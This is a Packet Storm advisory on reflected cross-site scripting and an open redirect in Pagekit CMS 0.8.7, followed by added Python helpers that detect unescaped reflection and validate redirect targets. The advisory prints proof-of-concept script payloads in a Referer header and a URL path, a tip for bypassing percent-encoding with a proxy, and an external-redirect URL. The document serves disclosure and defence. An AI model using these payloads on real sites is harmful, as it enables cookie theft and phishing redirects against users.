PACKETSTORM:128641
Oct 13, 2014

Pagekit 0.8.7 Cross Site Scripting / Open Redirect

Mahendra
packetstormsecurity.com

```text
# Exploit Title: Pagekit 0.8.7 Multiple Vulnerabilities
# Date: 13-10-2014
# Remote: Yes
# Exploit Author: Mahendra
# Vendor Homepage: http://www.pagekit.com/
# Version: 0.8.7
# Tested on: Windows XP SP 3 with WAMP Server 2.4

The latest Pagekit CMS (0.8.7) was found to be vulnerable to multiple reflected cross-site scripting issues because the application does not properly validate user-supplied input before reflecting it in its responses.

Pagekit is a modular and lightweight CMS built from the ground up with modern technologies like Symfony components and Doctrine. It will have a built-in marketplace to provide an awesome platform for theme and extension developers. Pagekit will be MIT licensed and hosted on GitHub.

-------------------------------------------------------------------
Reflected cross-site scripting (CVE-2014-8069)
-------------------------------------------------------------------

Referer HTTP Header
--------------------

The value of the Referer request header is reflected in the response without encoding. Note that a browser derives Referer from the URL of the referring page, so an attacker needs some way to make the victim's browser send the crafted header; this makes the Referer vector harder to exploit in practice than a payload carried in the URL itself.

GET /pagekit-0.8.7/index.php/user HTTP/1.1
Host: localhost
Referer: <ScRiPt>alert(document.cookie)</ScRiPt>
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: pagekit_session=unl3outg9eufv7fs7juq1ui1m6
Connection: keep-alive
Cache-Control: max-age=0


Arbitrary URL
--------------------
The payload in the URL below is percent-encoded before it reaches the application. However, this is easily bypassed by intercepting the request with a proxy and restoring the raw payload before it is sent.

http://localhost/pagekit-0.8.7/index.php/1<ScRiPt>alert(document.cookie)</ScRiPt>

-------------------------------------------------------------------
Open redirection (CVE-2014-8070)
-------------------------------------------------------------------

The redirect parameter of the logout handler is used as the post-logout destination without being checked against the application's own host, so a user can be sent to an arbitrary external site:

http://localhost/pagekit-0.8.7/index.php/user/logout?redirect=http://www.google.com
```
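The helpers below are an added example written for this page; they are not part of the advisory and not Pagekit's own code (Pagekit is PHP, but Python is used here so the checks run stand-alone). `reflection_state` classifies how a probe sent in the Referer header or the URL path comes back in a response body, distinguishing verbatim reflection from HTML-escaped reflection, and `is_local_redirect` / `safe_redirect` implement the target validation the logout handler above lacks, covering the scheme-relative and backslash variants that a naive "starts with /" check misses. `render_referer` models a page that echoes the Referer, with and without the fix. All function names and the sample response fragments are this example's own assumptions, constructed here rather than captured from Pagekit.

```python
"""Triage helpers for the two Pagekit 0.8.7 issues described above.

Added example, not part of the Packet Storm advisory or of Pagekit itself.
The response fragments are constructed for illustration, not captured from
the application; all function names are this example's own.
"""
import html
from urllib.parse import urlsplit

# Default probe for reflection tests. It contains the metacharacters an XSS
# payload needs but no quotes, so the escaped forms below are unambiguous.
PROBE = "<pkprobe>"


def render_referer(referer: str, escape_output: bool) -> str:
    """Model a page that echoes the Referer header into element content.

    escape_output=False reproduces the vulnerable behaviour (verbatim
    reflection); True applies the fix, HTML-escaping before output.
    """
    value = html.escape(referer, quote=True) if escape_output else referer
    return f"<p>You came from: {value}</p>"


def reflection_state(body: str, probe: str = PROBE) -> str:
    """Classify how `probe` (sent in a header or the URL path) comes back.

    'raw'     - reflected verbatim, so script injection is possible
    'escaped' - reflected only with &, < and > (and optionally quotes) encoded
    'absent'  - not reflected at all

    Other encoders may use different entities for quotes (PHP's
    htmlspecialchars emits &#039; for a single quote), so send a probe
    without quotes or add those forms to `escaped_forms`.
    """
    if probe in body:
        return "raw"
    escaped_forms = {html.escape(probe, quote=False), html.escape(probe, quote=True)}
    if any(form in body for form in escaped_forms):
        return "escaped"
    return "absent"


def is_local_redirect(target: str) -> bool:
    """Accept only path-only targets on the current site.

    Rejects absolute URLs (http://evil.example), scheme-relative URLs
    (//evil.example), scheme-only tricks (javascript:..., https:evil.example)
    and backslash variants (/\\evil.example) that some browsers treat as
    slashes. Relative paths without a leading slash are rejected too, since
    they resolve differently depending on the current URL.
    """
    if not target:
        return False
    normalized = target.replace("\\", "/")
    if normalized.startswith("//"):
        return False
    parts = urlsplit(normalized)
    if parts.scheme or parts.netloc:
        return False
    return normalized.startswith("/")


def safe_redirect(target: str, default: str = "/") -> str:
    """Return the Location value a hardened logout handler should emit."""
    return target if is_local_redirect(target) else default


if __name__ == "__main__":
    # The Referer payload and redirect target from the advisory above.
    payload = "<ScRiPt>alert(document.cookie)</ScRiPt>"
    print(reflection_state(render_referer(payload, False), payload))  # raw
    print(reflection_state(render_referer(payload, True), payload))   # escaped
    print(safe_redirect("http://www.google.com"))                      # /
    print(safe_redirect("/user"))                                      # /user
```

The reflection check is deliberately a string test rather than a full HTML parse: for triage you only need to know whether the metacharacters survived, and the same probe works for the URL-path vector (a 404 page that echoes the request path) as for the header vector. For the redirect fix, the point of `urlsplit` after normalizing backslashes is that both the scheme and the netloc must be empty; checking only for a leading `/` would still pass `//www.google.com`, which browsers resolve as a scheme-relative absolute URL.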
